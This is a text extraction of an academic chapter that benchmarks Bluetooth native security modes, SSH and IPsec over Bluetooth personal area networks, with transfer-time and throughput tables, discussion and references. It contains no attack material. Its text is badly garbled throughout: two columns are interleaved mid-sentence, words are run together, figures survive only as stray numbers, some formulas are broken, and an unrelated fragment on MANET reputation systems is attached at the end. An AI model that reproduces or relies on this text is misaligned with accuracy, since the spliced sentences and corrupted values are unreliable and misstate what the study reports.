On the contrary, Bluetooth security native modes network performance parameters we utilized on
utilize the hardware encryption of the Bluetooth the server side the well known network analyzer
chip, thus performance depends heavily on the “ethereal” (www.ethereal.com), version 0.10.12,
chip per se. This situation will allow us to make which in turn uses the “tcpdump” tool. In addi-
several observations about different layer security tion, for the Linux environment, we employed
mechanisms when deployed over dissimilar user theBlueZofficialLinuxBluetoothprotocolstac
devices. (www.bluez.org), which provides support for the
Specifically, the chapter will evaluate several
core Bluetooth layers and protocols.
personal area network (PAN) parameters, includ- Bluetooth supports three different security
ing transfer times, link capacity, and throughput. modes called security modes I, II, and III, but in

our tests we decided to use only security modes DES

3 algorithms for confidentiality -in both ma
I and III. Security mode I offers no real security chines by installing IPsec-tools (http://ipsec-tools.
asauthenticationandconfidentiality services
sourceforge.net/) andare
Openswan (www.openswan.
disabled. On the other hand, security mode II org) as well. For SSH secured communication we
provides security services after the connection used OpenSSH. In fact, many open-source projects
between the two devices has been established and exist. In addition to FreeSWAN and openswan
only if a given application has requested them. which both enable IPsec in the Linux kernel,
Thus, the security services in mode II depend on openvpn (http://openvpn.net/) can be used to cre-
the application running. The last security mode is ate TLS-encrypted point-to-point connections.
the most powerful among the three modes because For SSH confidentiality services we chose four
itmandatesbothauthenticationand confidentiality
algorithms to test namely, 3DES, AES, Arcfour,
built-in mechanisms independently of the applica- and Blowfish. Finally, for both IPsec and SSH
tion running. These mechanisms are referred to we employed only symmetric cryptography and
as Bluetooth baseband security procedures, where manual keying procedures for the authentication of
the baseband layer deals with the SAFER+ algo- parties considering the fact that usually Bluetooth
rithms (Massey, Khachatrian, & Kuregian, 1998). piconets are formed ad hoc and their users do not
As implied, one of the terminals was acting as a holdpublickeycertificates.
client and the other one as the server. Therefore,
the server should require security and the client
should respond accordingly. PErforMAncE MEAsurEs
For IPsec, the engaged machines must have the
same security policies in order to communicate As mentioned before, the experimental procedure
securely.So,weconfiguredLinuxtouseMD5and consists of three main parts: evaluation of Bluetooth
SHA1 algorithms for data integrity and DES and built-in security modes I (no security), and III
Table 1. Hardware and software characteristics of the engaged machines

Laptop Server
Processor Intel Celeron M. – 1.4 GHz
RAM 256 MB
Operating System SUSE Linux Ver. 10.0
Bluetooth Adapter Trust Bluetooth adapter Class 1
First pair
Palmtop Client
Model HPiPAQh540
Processor 400 MHz Intel XScale PXA250
RAM 64 MB
Operating System Familiar PDA OS 0.8.4
Bluetooth Adapter Bluetooth 1.1 compliant
Laptop client and server

Second
pair
RAM 256 Mbytes

(strong security), and estimation of the performance Achieved_Transfer_Rate(Kbps) = (bytes_

of IPsec and SSH mechanisms over Bluetooth links. sent + bytes_received) * 8) / TT
In all scenarios we gathered measurements for • Throughput represents the percentage of
the subsequent network performance parameters: Achieved_Transfer_Rate over the practical
absolutefiletransfertime(TT)achieved , transfer
maximum_transfer_rate of the link, which
rate (ATR), and throughput (THR). All measure- in our case is 723 Kbps:
ments took place at the server node because of its Throughput() % = achieved_transfer_rate /
processing power. max_transfer_rate * 100
• Finally, Achieved_Transfer_Rate_Improve-
• The Transfer_Time represents the actual ment is a comparison metric that indicates the
duration of transfers during a transaction. improvement of the Achieved_Transfer_Rate
• The Achieved_Transfer_Rate represents the with respect to the Bluetooth mode I achieved
actual transfer rate achieved during a trans- transfer rate Achieved_Transfer_Rate_B_I
action. In an ideal scenario, a constant data and is calculated as:
rate should be maintained between the two Achieved_Transfer_Rate_Improvement(%)
communication end-points. However, due to =ATR
( -ATR_B_I)/ATR_B_I0 *1
various reasons, mainly related to the wireless
medium nature, this parameter is changing A positive value implies that the performance
over time. We should underline the fact that (or channel throughput) has increased compared to
bytes_sent and bytes_received could also the Bluetooth mode I achieved transfer rate, while
contain retransmitted bytes. a negative one means that the performance has
Figure 2. Average metric values for network parameters measured/Bluetooth Modes I and III
transfer tim es (tt)

.
0.0
0.0
0.0 .
seconds
0.0
0.0
0.
0.0
Mode I
0.0
Mode III
.
0.0
. MB MB 0. MB MB
file size
throughput (tHr) Achieved transfer rate (Atr)

.0
. .0
. .
. .
.0
. .
.
Percentage (%)
0. 0.
.
. 0.0 0.
kbps
.
. .
. .0
.0
. .0
.
.
Mode I .0 .0 Mode I
. .
. Mode III Mode III
.
.0
.
. MB MB 0. MB MB
. MB MB 0. MB MB
file size
file size
0
decreased. Measurements were gathered during Moreover, encryption algorithms are applied
repeated FTP file transfers, between during the laptop
the transaction for mode III and as a result
server and the PDA client from the one hand and the overall transfer time is increased. We can also
between the laptop client and server from the other. perceivethatthelargerthefilesizeis,thelong
Each file was transferred twelve times the and only
TTdifference betweenmodeandmodeis
average values were recorded. In all scenarios, expected to be. This situation is also depicted in
the ping response times between client and server the respective plot of Figure 2. In general, these
were varying among 19.7 and 21.8msecs. Due measurements advocate that mode I utilizes the
to space limitations, in the following firstbetter
network three than mode III. Because of the
subsections we present only the analytical results volatile nature of the wireless link, we also report
derived from the laptop server/PDA client, which standard deviation (SD) for the measured values
is without doubt the most interesting one, while in Table 2.
some indicative corresponding comparisons with
the other laptop client–server pair is exhibited in secure shell (ssH) Evaluation
the subsection titled “Comparison Between PDA
and Laptop Clients.” Experimental procedures for the SSH mechanism
(IETF, 2006; OpenSSH, 2006) consider the transfer
bluetooth security Modes I and III ofthesamefourfiles,asbefore,betweentheclient
Evaluation and the server. Table 3 displays the average times
of all metrics used, while Table 4 presents the cor-
Measurements for testing Bluetooth modes I and responding standard deviation values.
IIIweregatheredbytransferringfourdifferent files
As we can notice, SSH gives highly increased
between each client–server pair. The files’times
transfer sizes when compared to Bluetooth secu-
were 5.26, 7.0, 10.5, and 15 Mbytes, respectively. rity modes. For instance, we can spot a difference
Figure 2 provides a graphical representation of of +12.6 seconds to +13.4 seconds for the small-
these values comparing TT times achieved in the est file depending on the cipher used. Moreover,
PDA client–laptop server piconet. As we can eas- it is more than obvious that all the ciphers used
ily notice, the results are generally as expected, are more or less of the same performance. This
but there are some interesting points which need is easily proven if we examine for example the
furtheranalysis.Atfirst,theTTmetric isslightly
achieved transfer rates in each case, which shown
higherformodeas , wellastheATRishigher forslight differences.
very
modeThis
. happensbecausemodeIIImandates Another interesting assumption that we can
authentication (handshake) at the beginning of each make is that as the size of the file increases, the
transaction. Keep in mind that the handshake time achieved transfer rate and the throughput become
is included in TT too. bigger. This happens because of the procedure of
the authentication which takes place during the ini-
Table 2. Standard deviation for all Bluetooth scenarios
MODE I MODE III

TT ATR THR TT ATR THR
File Size (MB)
(sec) (Kbps) (%) (sec) (Kbps) (%)
5.26 0.5 2.6 0.4 0.1 1.3 0.2
7 0.1 0.9 0.1 0.5 3.2 0.4
10.5 0.4 1.6 0.2 0.1 0.5 0.1
15 0.2 0.5 0.1 0.6 2.2 0.3

Table 3. Average values for network parameters measured (SSH)

5.26 MB 7 MB
3DES 90.1 526.4 72.8 116.9 555.6 76.9
AES128 90.2 525.6 72.7 116.9 556.2 76.9
Arcfour 90.5 523.8 72.5 117.3 554.2 76.6
Blowfish 90.5 523.6 72.4 117.6 552.8 76.4
10.5 MB 15 MB
3DES 163.0 581.8 80.5 221.3 603.2 83.4
AES128 162.9 582.4 80.5 221.3 603.6 83.5
Arcfour 163.1 581.6 80.5 221.6 602.4 83.3
Blowfish 162.8 582.6 80.6 222.1 601.2 83.1
Table 4. Standard deviation for all SSH scenarios

5.26 MB 7 MB
3DES 0.4 2.1 0.3 0.4 2.1 0.3
AES128 0.9 5.5 0.7 0.4 1.9 0.2
Arcfour 0.1 0.4 0.1 0.2 1.1 0.2
Blowfish 0.6 3.8 0.5 1.0 4.9 0.7
10.5 MB 15 MB
3DES 1.0 3.3 0.5 0.8 2.5 0.3
AES128 1.0 3.9 0.5 0.9 2.3 0.3
Arcfour 0.5 1.9 0.3 0.6 1.7 0.2
Blowfish 0.6 1.9 0.3 0.7 1.9 0.3
tial SSH handshake. In any case it should be noted and the server. IPsec uses two mechanisms (proto-
that the improvement in the achieved transfer rates cols) that may be used independently or jointly to
always compared to Bluetooth security mode I and securetheoutcomingtraffic,namelyauthenticati
induced by SSH, are negative for any scenario. This header (AH) offering data origin, connectionless
means that Bluetooth’s native mechanisms offer
better bandwidth and network utilization at almost
all cases examined. This remark is confirmed Tableby 5.%ATRdeteriorationforSSH
the values given in Table 5. Bluetooth
3DES AES128 RC4 Blowfish
Size Mode I
IPsec Evaluation 5.26 618.0 -14.8 -15.0 -15.2 -15.3
7 620.2 -10.4 -10.4 -10.6 -10.9
The procedure for the IPsec protocol (Kent & 10.5 621.2 -6.3 -6.2 -6.4 -11.0
Atkinson, 1998a, 1998b) considers once again the 15 621.4 -2.9 -2.9 -3.3 -3.3
transfer of the same four files between the client

TableAverage
6. valuesfornetworkparametersmeasured(IPsec)
5.26 MB 7 MB
AH_MD5 72.8 683.4 94.5 100.0 682.8 94.4
AH_SHA1 72.8 683.2 94.5 99.9 683.0 94.5
ESP_DES_MD5 74.4 681.0 95.0 102.0 686.6 95.0
ESP_3DES_MD5 73.8 681.0 95.7 102.2 685.2 94.8
ESP_DES_SHA1 74.2 680.0 95.2 102.0 686.6 95.0
ESP_3DES_SHA1 74.2 681.0 95.2 101.8 688.2 95.2
10.5 MB 15 MB
AH_MD5 145.9 682.6 94.4 205.2 683.4 94.5
AH_SHA1 145.7 683.4 94.5 205.1 683.8 94.6
ESP_DES_MD5 148.6 688.2 95.2 208.9 688.8 95.3
ESP_3DES_MD5 148.6 687.8 95.1 209.1 688.0 95.2
ESP_DES_SHA1 148.5 688.4 95.2 209.2 688.0 95.2
ESP_3DES_SHA1 148.6 688.0 95.2 210.5 683.6 94.6
Table 7. Standard deviation of measurements of all IPsec scenarios

5.26 MB 7 MB
AH_MD5 0.0 0.5 0.05 0.1 0.8 0.12
AH_SHA1 0.1 0.4 0.1 0.1 0.0 0.05
ESP_DES_MD5 0.1 0.4 0.1 0.3 2.1 0.28
ESP_3DES_MD5 0.5 4.5 0.6 1.3 8.6 1.19
ESP_DES_SHA1 0.0 0.4 0.06 0.6 3.7 0.53
ESP_3DES_SHA1 0.0 0.4 0.06 0.1 0.4 0.1
10.5 MB 15 MB
AH_MD5 0.1 0.5 0.06 0.2 0.5 0.08
AH_SHA1 0.2 0.9 0.1 0.1 0.4 0.03
ESP_DES_MD5 0.1 0.8 0.09 0.1 0.4 0.04
ESP_3DES_MD5 0.1 0.8 0.08 0.1 0.0 0.03
ESP_DES_SHA1 0.0 0.5 0.02 0.3 1.0 0.13
ESP_3DES_SHA1 0.1 0.7 0.06 2.4 7.6 1.05
data integrity, and optionally replay protection, vices. Note however that MD5 is not considered
and encapsulating security payload (ESP) offering secure anymore and is reported here for the sake of
confidentialityandprotectionagainst - trafficanaly
completeness. In total, we deployed six scenarios
sis. In our scenarios we utilized both mechanisms, as shown in Table 6.
using the MD5 and SHA1 algorithms for integrity First and foremost, all network metrics for IPsec
andDESandDES 3 tosupportconfidentiality - areser
remarkably concentrated. Standard deviation

values rendered in Table 7 confirm this remark.

comparison between PdA and
Surprisingly, IPsec gives better transfer times laptop clients
forallfilesizeswhencomparedtoBluetoothand
SSH.Thisisalsoconfirmedby%ATRimprove - Considering the second experimental pair, which
ment for IPsec shown in Table 8. In particular, all employs laptops for both the server and the client
IPsec times are very close to those of Bluetooth’s (see Table 1), TT times were better for all the cor-
mode I, while at the same time are considerably responding scenarios, namely Bluetooth native
better than SSH’s. Note, that IPsec renders 210.5 security modes, SSH and IPsec. For instance,
seconds as the highest time duration for transferring Bluetooth modes show a slight TT improvement
thebiggestfile,whilecorrespondinglyranging SSHgives from 1 to 3 seconds depending on the
222.1 seconds, mode III produces 213.2 seconds, file size. Specifically, TT for the 7 MB file was
and mode I 211.6 seconds. This is partially due 102.8 and 106.5 for Bluetooth mode I and III,
to substantially increased (and highly stabilized) respectively. Approximately the same situation is
bandwidth that IPsec generates. The aforemen- reported for SSH and IPsec as depicted in Figure
tionedobservationsarealsoconfirmed bythe
3. This factas the laptop client incorporates
is expected
that during IPsec measurements we had a very a faster CPU and thus gains more in cryptographic
low rate of packet loss reported by the Ethereal operations that SSH and IPsec mandate. The same
utility. It is important to note that the throughput remark is applied for the other two network per-
was better when using ESP. On the contrary, when formance parameters, throughput and ATR. As in
usingAH,thethroughputfortransferring the
the PDA files
client case, IPsec continues to perform
was lower. This can be explained by the fact that better under all circumstances for the laptop client
authentication is applied in AH. due to its throughput optimization. However, IPsec
TableATR
8.% improvementforIPsec
AH_ ESP_DES_ ESP_3DES_
File Bluetooth
MD5 SHA1 MD5 SHA1 MD5 SHA1
Size Mode_I
5.26 618.0 10.6 10.6 11.1 11.4 11.9 11.4
7 620.2 10.1 10.1 10.7 10.7 11.5 11.0
10.5 621.2 9.9 10.0 10.8 10.8 10.7 10.8
15 621.4 10.0 10.0 10.8 10.7 10.7 10.0
Figure 3. Comparison of network transfer times between Laptop and PDA clients
ssH transfer tim e (7 Mb) IPsec transfer tim e (7 Mb)
.0 0.
0.
. . 0.0
.0 0.0
. 0.0
. 0.
.0 0.
0.
seconds
0.
0.0
seconds
.0 Laptop client 0.0 0.0

00.
PDA client 00. 00.
.0
0. Laptop client
00.0 . PDA client
0.0
0. 0. 00.0
.
0.0
0. D A A
_M HA MD MD SH SH
0.0 AH _S S_ S_ S_ _
AH DE DE E ES
P_ P _ P _D _ D
DES AES Arcfour Blow fish ES ES ES SP
E

TT times remain very close to those of Bluetooth bits is encoded into a 15 bit codeword, and is capable
securitymodes.Thesamesituationisof confirmed
correcting single bit error in each block. Table
by the minimum standard deviation values that 9 shows the different ACL packet types and their
characterize the IPsec case. Also in this case, SSH properties. The values in the table are theoretical
gives the worst performance compared with IPsec without packet overhead. For example, over an
and Bluetooth native security modes. ACL link using DH5, one can send about 300 to
320 kbit/s of UDP user data, while the theoretical
limit is 433.9 kbit/s.
coMMEnts on tHE rEsults This means that in order to overcome the effect
of low and varying link quality on throughput,
This section provides a comparative view of the the selection of the optimal link layer packet size,
conducted results. Also, we attempt to provide a under estimated channel conditions, is crucial.
better explanation of the experiment outcomes. Indeed some research work (Chen, Kapoor, Sana-
But before that we must shortly discuss important didi, & Gerla, 2004) points this out by evaluating
characteristics of Bluetooth connections that may the “optimal” link layer packet size based on the
affect the performance of the connection. Bluetooth current bit error rate of the channel. Moreover, in
employs frequency hopping spread spectrum regions that Wi-Fi networks coexist with Bluetooth
(FHSS) to avoid interference. There are 79-23 in and because Wi-Fi and Bluetooth utilize spectrum
some countries-hopping frequencies, each having in different ways, they can cause considerable
a bandwidth of 1MHz. Frequency hopping is as- interference between each other (depending on
sisted with fast automatic repeat request ARQ)
( ,
the relative location of the 802.11b and Bluetooth
cyclic redundancy check (CRC), and forward error devices) (Yip & Kwok, 2004). By transmitting at
correction (FEC) to achieve high reliability on the the highest power level, Bluetooth class 1 devices
wireless links. All the data/control packet transmis- would create more interference than Bluetooth’s
sions are synchronized by the master. Slave units class 2 and class 3 devices, which transmit at
can only send in the slave-to-master slot after being lower power levels. Furthermore, because each
addressed in the preceding master-to-slave slot, Bluetooth PAN will occupy the entire ISM band,
with each slot lasting 625 microseconds. two or more coexisting Bluetooth PANs will oc-
For real-time data such as video, synchronous casionally collide, possibly causing loss of data
connection oriented (SCO) links are used, while packets. Of course, apart from implementation
for data transmission, asynchronous connectionless issues (e.g., protocol stacks), the aforementioned
link (ACL) links are employed. There are several parameters are closely related and can affect real
ACL packet types, differing in packet length and Bluetooth connections and the results gathered
whether they are FEC coded or not. The FEC cod- in this chapter. For instance, all experiments
ing scheme used in ACL DM mode is a shortened were conducted inside the coverage area of the
Hamming code, where each block of 10 information University’s hot-spot.
Table9.PackettypesforBluetoothACLConnections(theoreticalvalues)
Mode FEC Packet (bytes) Size (kbps) Symmetric (kbps) Asymmetric (kbps)
DM1 2/3 0-17 108.8 108.8 108.8
DM3 2/3 0-121 258.1 387.2 54.4
DM5 2/3 0-227 286.7 477.8 36.3
DH1 no 0-27 172.8 172.8 172.8
DH3 no 0-183 390.4 585.6 86.4
DH5 no 0-339 433.9 723.2 57.6

In the following, we present comparative graphs terminology). In addition to the protocol-level

only for two of the three network parameters, trans- handbrake, the SSH file transfer protocolSFTP) (
fer times, and throughput for the PDA client. As that runs on top of SSH contains its own handbrake.
already noted in “Comparison between PDA and This protocol recommends that reading and writing
Laptop Clients,” the laptop client scenario results is limited to less than 32K of data, even though it
are directly comparable with those of the PDA client is running over the reliable SSH transport which in
and thus do not contribute further to this discussion. turn runs over the reliable TCP/IP transport. One
Consequently, Figure 4 illustrates a comparison common implementation limits SFTP packets to
of the transfer times for six selected scenarios in 4K bytes, resulting in a mere 4% link utilization in
total. We easily spot that all times, especially for the previously-presented scenario.
filesizessmallerthanMB, 5. 0 1 seemtobehighlyFinally, Figure 5 depicts a comparison of the
concentrated. This means that (excluding SSH achievedthroughputforthespecificsixscenarios
ones) we have marginal differences between the This plot gives a clearer idea about the achieved net-
performances’ of the conducted scenarios. But, the work performance. In short, IPsec scenarios visibly
bigger the size gets, the difference tends to slightly have the best performance by far followed closely
decrease. Apart from the fact that all tests have by the two Bluetooth’s security modes. Moreover,
the Bluetooth link parameter in common, this can we can make a very important observation about
be explained by the fact that Bluetooth modes and the SSH’s performance. It is obvious that SSH’s
IPsec utilize the network better. throughputincreasesasthefile’ssizeincreases.T
On the downside, SSH does not always provide happens because of the handshaking phase which
peak network performance because it traditionally takes place during the initialization of each transac-
has been more focused on providing security. In tion.So,asthesizeofthetransferredfileincrease
a nutshell, SSHv2 introduced an additional form the impact of handshaking decreases and thus we
of ow
fl control that requires the receiver to
notice an ACK in the throughput. We should also
increase
each packet before more packets can be sent. Most report that the throughput of the other two scenarios
implementations seem to use packet sizes of 16K remainsmoreorlessstableforallthefilesizeswe
or occasionally 32K, with some going as low as utilized. Another important issue is that during
4K. This means that no matter how fast the link, the experiments we observed a significant rate of
every for example, at 16K the transmission stops for packet loss for both Bluetooth security modes and
one round trip time awaiting the other side to send SSH scenarios affecting their overall performance.
its ACK (referred to as a window adjust in SSHv2 Certainly, the main reason for this is the volatile
nature of the wireless connection itself.
Additionally, it is well known that the addition
Figure 4. Comparison of network transfer times of an IPSec header may cause IP fragmentation.
for six different scenarios (PDA client) However, the main concern in IPsec overhead is in
the encryption, decryption, and authentication of
0 Comparison of Transf er Times f or dif f erent scenarios
0 MODE I the actual IPsec (ESP and/or AH) packets. Tunnel
00 MODE III setup and rekeying occur much less frequently than
0
0
DES packet processing and, except in highly unusual
Blowf ish
0 circumstances, their overheads are not worth wor-
0 AH_SHA
Seconds
0
ESP_DES_SHA
rying about. According to some other works (e.g.,
0
0
FreeSwan, 2002) utilizing low-end machines, a
0 60 MHz Pentium running a host-to-host tunnel
0
00
to another machine shows an FTP throughput of
0 slightly over 5 Mbit/s either way. Thereafter, we
0 file sizes
0 can conclude that in our case the IPsec mechanisms
. MB MB 0. MB MB running on “relatively” low-end processors is not

really a bottleneck. The overall performance is protocol overhead induced. These screens illustrate
rather affected most by the quality of the Bluetooth the overall network statistics for Bluetooth mode III
link itself, meaning that due to better utilization of and IPsec AH_MD5, respectively. The “Data” sec-
the link and possibly due to optimal ACL scheme tion corresponds to the overall percent of data that
and lower packet drop rate, IPsec performs slightly were sent from the server towards the PDA client
better than native Bluetooth modes do. forthe6MB 2. 5 file.WeobservethatIPsecneeds
In Figure 6, we present some indicative ethereal considerably lower percent of TCP data packets to
screens that attest why in practice IPsec performs complete the transaction (49.63%) than Bluetooth
better from the other two in terms of the additional mode III which requires 66.24%. Note, that exclud-
ing ARP messages, the remaining percent corre-
sponds to control information sent from the client
Figure 5. Comparison of networkthroughputfor
to the server including ACKs, retransmissions, and
six different scenarios (PDA client)
so forth. Therefore, IPsec utilizes the link better,
Comparison of Throughput for different scenarios achieving higher performance.

Another important factor that may affect the

conducted results is the operating system itself. For

that we performed partial measurements using the
0
Windows XP operating system in the laptop client,

while keeping all the other test-bed parameters
unchanged. Under this setting, we observed sig-
Percentage (%)

nificantlylesserpacketretransmissionsandlog

fairly better times. For example, for Bluetooth mode

IIIandfilesizeMB 5. 0 1 wegotanaveragetransfer
0
MODE I time of 150 seconds, namely 5 seconds better than
MODE III
DES
Linux. One can presume that the Bluetooth stack

Blowf ish is better implemented in Windows than in Linux or
AH_SHA
ESP_DES_SHA
the Bluetooth adapters that we used perform better

. MB MB file sizes 0. MB MB
under Windows, perhaps due to their drivers’ imple-
mentation. Nevertheless, a detailed analysis of this
Figure6.Etherealscreenswithprotocolhierarchystatistics(PDAclient)

behavior between the two major operating systems AcknowlEdgMEnt

is necessary but left for future work. An additional
interesting research question is whether the recent We would like to thank Mr. Alexis Andreadis and
updates of the Bluetooth specification to version
Mr. Paganos Charalampos for helping us with the
that
2. 1 haveintroducedsignificantchanges network inmeasurements.
the
Bluetooth protocol stack, including optional ow fl
control, can affect the performance of the security
mechanisms under investigation (Misic, Chan, & rEfErEncEs
Misic, 2005). However, this is out of scope of the
current chapter. Adam, L. (2003). Serious flawsinBluetooth - secu
For the laptop client we also provide some in- rity lead to disclosure of personal data. Retrieved
dicative metrics concerning the physical memory October 14, 2007, from http://www.bluestumbler.
consumption for the three categories of scenarios. org
Morespecifically,memoryconsumption - forBlue
tooth modes I and III was 552 KB, which is the Bluetooth SIG. (2003, November 1). Specification
“pand” daemon. For SSH we have an additional of the Bluetooth system: Architecture & technol-
1920 KB, thus in total 2472 KB (“sshd” and “pand” ogy overview (Version 1.2). Retrieved October 14,
deamons), and finally for the IPsec case we2007, have from http://www.bluetooth.com
4027 KB (“pluto” and “pand” daemons). Chen, L., Kapoor, R., Sanadidi, M. Y., & Gerla,
M. (2004). Enhancing Bluetooth TCP throughput
via link layer packet adaptation. In Proceedings of
conclusIon And futurE work the IEEE ICC ’04 (Vol.7, pp. 4012-4016).
This chapter addresses performance issues for De Morais Cordeiro, C., Sadok, D., & Agrawal, D.
Bluetooth host-to-host connections. Three distinct P. (2001). Modeling and evaluation of Bluetooth
categories of scenarios were used to test whether MAC protocol. In Proceedings of Tenth Interna-
well respected security mechanisms of Internet tional Conference on Computer Communications
and application layers of the TCP/IP suite are ad- and Networks (pp. 518-522).
vantageous when deployed over Bluetooth PANs Francia, G., Kilaru, A., Le Phuong, & Vashi, M.
compared to Bluetooth native security modes. The (2004). An empirical study of Bluetooth perfor-
results disclose that IPsec better utilizes the wireless mance. In Proceedings of the 2nd Annual Confer-
link and thus provides radically improved transfer ence on Mid-South College Computing, ACM
times when compared with SSH. Native Bluetooth International Conference Proceeding Series (Vol.
modes service times are close to those of IPsec’s 61, pp. 81-93).
thus significantly better from SSH ones. On the
other hand, there is an important disadvantage FreeSwan. (2002). Performance of FreeSwan.
which is the high amount of the memory resources Retrieved October 14, 2007, from http://www.
IPsec consumes. freeswan.org/freeswan_trees/ freeswan-1.95/doc/
As future work we would like to expand this performance.html
study, investigating the performance of asymmetric Gehrmann, C., & Nyberg, K. (2002). Enhancements
cryptography mechanisms, for example, public key to Bluetooth baseband security. Ericsson Mobile
certificates,andtosupportauthentication services
Communcations in
AB, Ericsson Research.
the context of such protocols that promote automatic
keying. Another direction is to detect how much Gehrmann, C., Persson, J., & Smeets, B. (2004).
energy is required for this sort of secure connec- Bluetooth security. Artech House Publishers.
tions, as mobile devices can not afford batteries
Golmie, N., & Rebala, O. (2003). Techniques to im-
with unlimited capacity.
prove the performance of TCP in a mixed Bluetooth

and WLAN environment. In Proceedings of IEEE OpenSSH. (2006). OpenSSH project home page.
International Conference on Communications, Retrieved October 14, 2007, from http://www.
ICC, Anchorage, AK, (pp. 1181-1185). openssh.org
Howitt, I. (2002). Bluetooth performance in the Persson, K., & Manivannan, D. (2003). Secure con-
presence of 802.11b WLAN. IEEE Transactions nections in Bluetooth scatternets. In Proceedings of
onVehicularTechnology, 15
(6), 1640-1651. the63 th Annual Hawaii International Conference
on System Sciences (HICSS ‘03) (p. 314b).
IEEE. (2002). Wireless PAN medium access control
MACandphysicallayerPHYspecification. IEEE Shaked, Y., & Wool, A. (2005). Cracking the Blue-
standard.5 1 2.80 New York: IEEE. Retrieved Oc- tooth PIN. In Proceedings of the 3rd ACM Interna-
tober 14, 2007, from http://www.ieee802.org/15/ tional Conference on Mobile Systems, Applications,
and Services (pp. 39-50). ACM Press.
IETF. (2006). IETF secure shell (secsh) working
group. Retrieved October 14, 2007, from http:// Wang, F., Arumugam, N., & Krishna, G. H. (2002).
tools.ietf.org/wg/secsh/ Performance of a Bluetooth piconet in the presence
of IEEE 802.11 WLANs. In Proceedings of the
Jacobson, M., & Wetzel, S. (2001). Security weak-
13th IEEE International Symposium on Personal,
nesses in Bluetooth. In Proceedings of the Confer-
Indoor and Mobile Radio Communications (Vol.
ence on Topics in Cryptology: The Cryptographer’s
4, pp. 1742-1746).
track at RSA (LNCS 2020, pp. 176-191).
Yip, H. K., & Kwok, Y-K. (2004). A performance
Karnik, A., & Kumar, A., (2000). Performance
study of packet scheduling algorithms for coordi-
analysis of the Bluetooth physical layer. In Proceed-
nating colocated Bluetooth and IEEE 802.11b in
ings of IEEE International Conference on Personal
a Linux machine. In Proceedings of the 7th Inter-
Wireless Communications (pp. 70-74).
national Symposium on Parallel Architectures,
Kent, S., & Atkinson, R. (1998a). IP authentication Algorithms and Networks (ISPAN’04).
header (AH) (IETF RFC 2402).
Yujin, L., Jesung, K., Sang, L. M., & Joong, S. M.
Kent, S., & Atkinson, R. (1998b). IP encapsulating (2001). Performance evaluation of the Bluetooth-
security payload (ESP) (IETF RFC 2406). based public Internet access point. In Proceedings
ofthe5 1th International Conference on Information
Massey, J., Khachatrian, G., & Kuregian, M. (1998). Networking (pp. 643-648).
Nomination of SAFER+ as candidate algorithm for
the advanced encryption standard (AES). In Pro-
ceedings of the1st Advanced Encryption Standard
Candidate Conference. Retrieved October 14, 2007, kEy tErMs
from www.ee.princeton.edu/ ~rblee/safer+
Bluetooth: An industrial specification for
Miorandi, D., Caimi, C., & Zanella, A. (2003).
wireless personal area networks (PANs). Bluetooth
Performance characterization of a Bluetooth pi-
provides a way to connect and exchange infor-
conet with multi-slot packets. In Proceedings of
mation between devices such as mobile phones,
the WiOpt’ 03.
laptops, PCs, printers, digital cameras, and video
Misic, J., Chan, K. L., & Misic, V. B. (2005). TCP game consoles via a secure, globally unlicensed
trafficinBluetooth:Performance .2 1 and
- dimen
short-range radio frequency.
sioningofow fl control. In
Proceedings of WCNC
Goodput: The application level throughput,
’05 (pp. 1798-1804).
that is, the number of useful bits per unit of time

forwarded by the network from a certain source and IP header integrity (with some cryptography
address to a certain destination, excluding protocol algorithm also nonrepudiation). On the other hand,
overhead retransmissions, and so forth. the encapsulating security payload (ESP) protocol
provides data confidentiality, payload message) (
IEEE 802.15: The IEEE 802.15 WPAN working
integrity, and with some cryptography algorithm
group focuses on the development of consensus
also authentication.
standards for personal area networks or short dis-
tance wireless networks. These WPANs address Network Performance: The level of quality of
wireless networking of portable and mobile com- service of a telecommunications resource, protocol,
puting devices such as PCs, PDAs, peripherals, cell or product.
phones, pagers, and consumer electronics, allowing
Secure Shell or SSH: A set of standards and
these devices to communicate and interoperate with
an associated network protocol that allows estab-
one another. The IEEE Project 802.15.1 has derived
lishing a secure channel between a local and a
a wireless personal area network standard based on
remote computer. It uses public-key cryptography
theBluetoothv11Foundation . Specifications.
to authenticate the remote computer and to option-
IPsec: IPsec (IP security) is a suite of protocols ally allow the remote computer to authenticate the
for securing Internet protocol communications by user.SSHprovidesconfidentialityandintegrityof
encrypting and/or authenticating each IP packet data exchanged between the two computers using
in a data stream. IPsec also includes protocols for encryption and MACs.
cryptographic key establishment. There are two
Throughput: The amount of digital data per
modes of IPsec operation: transport mode and
time unit that are delivered to a certain terminal
tunnel mode. IPsec is implemented by a set of
in a network, from a network node, or from one
cryptographicprotocolsforsecuringpacketows. fl
node to another, for example, via a communica-
Specifically,the authentication header (AH) pro-
tion link.
tocol provides authentication, payload (message),
0
computation complexities are all relieved from the experiences of others goes unused, which
in this approach. However, communication decreasesefficiency.
overhead and behavior knowledge exchange Any reputation system in the context of MANET
is more complicated here. and WSN should, generally, exhibit three main
functions (Djenouri et al., 2005):
In literature, noncrypto approach is realized by
the adoption of reputation systems. A reputation • Monitoring: This function is responsible
systemisatypeofcooperativefilteringalgorithm for observing the activities of the nodes of
which attempts to determine ratings for a collection its interest set.
of entities that belong to the same community. Ev- • Rating: A node will rate its interest set nodes
ery entity rates other entities of interest based on a based on the node’s own observation (termed
given collection of opinions that those entities hold asfirsthandinformation)other , - nodes’obser
about each other (Michiardi & Molva, 2002). vations that are exchanged among themselves
Reputation systems have recently received (termed as second hand information), the
considerable attention in differenthistory fieldsofsuchthe observed node, and certain
as distributed artificial intelligence, economics,
threshold values.
evolutionary biology, and so forth. Most of the • Response: Once a node builds knowledge
concepts in reputation systems depend on social about others’ reputations, it should be able
networks analogy. As expected, reputation systems to decide upon different possible reactions
are complex in the sense that they do not have a it can take, like, avoiding bad nodes or even
single notion, but a single system will consist of punishing them.
multiple parts of notions. Thus, comparing reputa-
tion systems is, in fact, a very difficult problem. For secure routing problem in WSN, a reputation
All known trials on such problem were based on system can be a good solution for behavior-related
qualitative approach. The work proposed by Mui, problems. The efficiency of a proposed solution
Halberstadt, and Mohtashemi (2002) makes an will depend on:
attempt on comparing reputation systems quan-
titatively based on game theory. The authors, • The ability to monitor misbehavior events
thus, identify different notions of reputation correctly.
systems like, contextualization, personalization, • Usingagoodratingmodelthatcloselyreflects
individual and group reputation, and direct and the behavior of nodes.
indirect reputation. • Developing good routing algorithms and deci-
In the context of MANET and WSN (Bucheg- sion criteria that try to select the most trusted
ger & Boudec, 2003; Michiardi & Molva, 2002), routers and follow the least risky paths.
the reputation of a node is the amount of trust the
other nodes grant to it regarding its cooperation and In literature, there are reputation-based solu-
participation in forwarding packets. Hence, each tions proposed for MANET such as CONFIDANT
